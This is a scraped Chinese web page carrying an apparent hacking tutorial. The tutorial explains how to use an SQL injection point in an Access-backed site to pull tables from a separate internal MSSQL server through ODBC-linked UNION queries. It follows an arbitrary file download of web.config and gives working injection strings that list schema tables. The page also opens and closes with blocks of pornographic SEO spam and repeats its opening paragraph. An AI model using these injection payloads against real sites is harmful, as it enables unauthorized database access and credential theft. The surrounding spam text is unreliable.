成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

看黑客如何通過Access來獲取MSSQL數據

安全 網站安全
首先說明一點,這個方法很早就有了,不過用時大概在腦袋里沉寂太久,已經處于忘卻狀態。感謝Trace提供資料。經常會遇到任意文件下載漏洞,一般處理的方法是把數據庫連接文件下載回來,然后遠程連接上。

首先說明一點,這個方法很早就有了,不過用時大概在腦袋里沉寂太久,已經處于忘卻狀態。感謝Trace提供資料。經常會遇到任意文件下載漏洞,一般處理的方法是把數據庫連接文件下載回來,然后遠程連接上。

首先說明一點,這個方法很早就有了,不過用時大概在腦袋里沉寂太久,已經處于忘卻狀態。感謝Trace提供資料。

經常會遇到任意文件下載漏洞,一般處理的方法是把數據庫連接文件下載回來,然后遠程連接上去。最理想的狀態莫過于MSSQL和MYSQL,尤其是在數據庫和WEB不分離的情況下,備分SHELL,導出SHELL,可以用的方法很多。

不過要是數據庫和WEB分離,而且數據庫在內網不可上網,或者有防火墻等等 其他手段使得我們無法連上遠程數據庫時,不妨假設的再艱難一些,甚至無法找到一個mssql注射點時,很多情況下通常會束手無策。

這里以 MSSQL為例子,很湊巧找到一個任意文件下載漏洞,直接下了WEB.CONFIG回來看,發現數據庫在內網,找了半天沒找到注射點,稍微旁注一下,有一個站,可惜是ACCESS數據庫。猜不到表和后臺。不過目標站的后臺是知道的,然后準備從這個access注射點讀出目標站管理員帳戶。直觀一些,下面直 接給出我本地測試結果:


弄的簡單一點,就3個字段,ID,XM,XB,ID數字型,后面2個字符型。
假設存在漏洞的文件中,執行SQL語句 select * from test whrere id = 1
這里有3個字段,我們用UNION聯合查詢給他匹配一下就是(黑盒操作時用order by 或者窮舉來確定字段個數)
SELECT * FROM test where id=999999 union Select top 1 1,2,name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].ku

 

這里的master庫中我建立了一個名為KU的表,上面這個查詢語句中,由于id=999999不存在,在聯合查詢的作用下,web上原本顯示access數據庫內容的位置顯示出了我們構造的UNION查詢結果,name字段處于一個字符型的顯示位置。

2.jpg  大小: 5.25 K 尺寸: 200 x 74 瀏覽: 0 次 點擊打開新窗口瀏覽全圖


ku這個表里的name字段內容就會被顯示在web上相應的位置,不過這個顯然不是我們想要的,我們要的是整個表的結構和內容
以master為例子,這里是模擬的結果,事先我已經知道master的結構,待會方便和結果比對校驗是否有錯。

3.jpg  大小: 4.76 K 尺寸: 199 x 105 瀏覽: 1 次 點擊打開新窗口瀏覽全圖

SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables

這樣master庫的***個表名就出來了。

4.jpg  大小: 5.49 K 尺寸: 199 x 75 瀏覽: 0 次 點擊打開新窗口瀏覽全圖

獲得后面的表名也很簡單。
SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=****;DataBase=master].information_schema.tables)

5.jpg  大小: 5.17 K 尺寸: 199 x 73 瀏覽: 0 次 點擊打開新窗口瀏覽全圖
以次類以常規方法推取得字段名和字段內容,代碼煩瑣自行研究下。

如果數據庫里的ID是字符型,則
SELECT * FROM test where id='999999' union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;DataBase=master].information_schema.tables where '1'='1'

【編輯推薦】

  1. Adobe Reader練劍半月 0day夢魘終于完結 
  2. 白帽黑客友情提示:CCTV華軍軟件均含跨站漏洞
  3. 安全專家詳談:對付惡意軟件的策略及方法
  4. MSN中國官網昨日被掛馬 2009或成駭客盛年
  5. 安全公司稱俄羅斯已成為垃圾郵件超級大國
  6. 諾頓再次誤升級 廠商可無視用戶許可?
責任編輯:王文文 來源: 黑客基地
相關推薦

2010-09-13 15:40:56

2014-08-12 11:21:32

2011-08-24 13:24:41

2011-08-24 13:42:33

2011-09-05 17:11:51

2012-05-06 16:06:26

2022-06-17 10:28:00

人工智能網絡安全機器學習

2019-05-07 09:29:19

欺騙蜜罐網絡攻擊

2024-03-28 08:00:00

GenAI人工智能

2023-11-22 16:08:29

大數據提高數據質量

2010-04-14 09:41:10

Oracle數據備份

2021-12-16 12:07:04

滲透測試黑客攻擊

2011-01-20 17:44:25

2012-10-19 10:21:07

數據庫負載均衡mssqlserver

2010-08-03 10:26:42

黑客

2011-05-13 10:07:47

LBS簽到

2016-06-12 17:20:47

2020-05-06 08:01:39

黑客惡意攻擊網絡安全

2009-12-17 10:18:36

2015-10-13 16:21:53

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美一区2区三区4区公司 | 久久国产美女视频 | www.99热| 日韩中文字幕视频在线 | 蜜桃日韩 | 国产中文字幕在线观看 | 久久亚洲一区二区 | 人人干人人爽 | 国产色婷婷精品综合在线手机播放 | 日韩在线欧美 | 国产激情91久久精品导航 | 久久一二区 | 精品一区二区电影 | 国产激情免费视频 | 欧美一区 | 超碰在线免费 | 中文字幕 在线观看 | 成人免费在线视频 | 天天操操操操操 | 欧美区日韩区 | 日韩www| 成人av一区 | 久久久久久久久综合 | 国产成人精品一区二区三区网站观看 | 免费精品视频 | 成人av一区 | 亚洲精品3 | 久久99精品久久久 | 欧美激情精品久久久久久 | 欧美第一页 | 欧美一区二区三区精品免费 | 亚洲一区二区三区国产 | 欧美一级全黄 | 黄色国产 | 国产免费一区 | 粉嫩国产精品一区二区在线观看 | 亚洲最大福利网 | 久久久999免费视频 999久久久久久久久6666 | 亚洲一区二区三区四区在线观看 | 粉嫩粉嫩芽的虎白女18在线视频 | 欧美精品一区二区三区四区 在线 |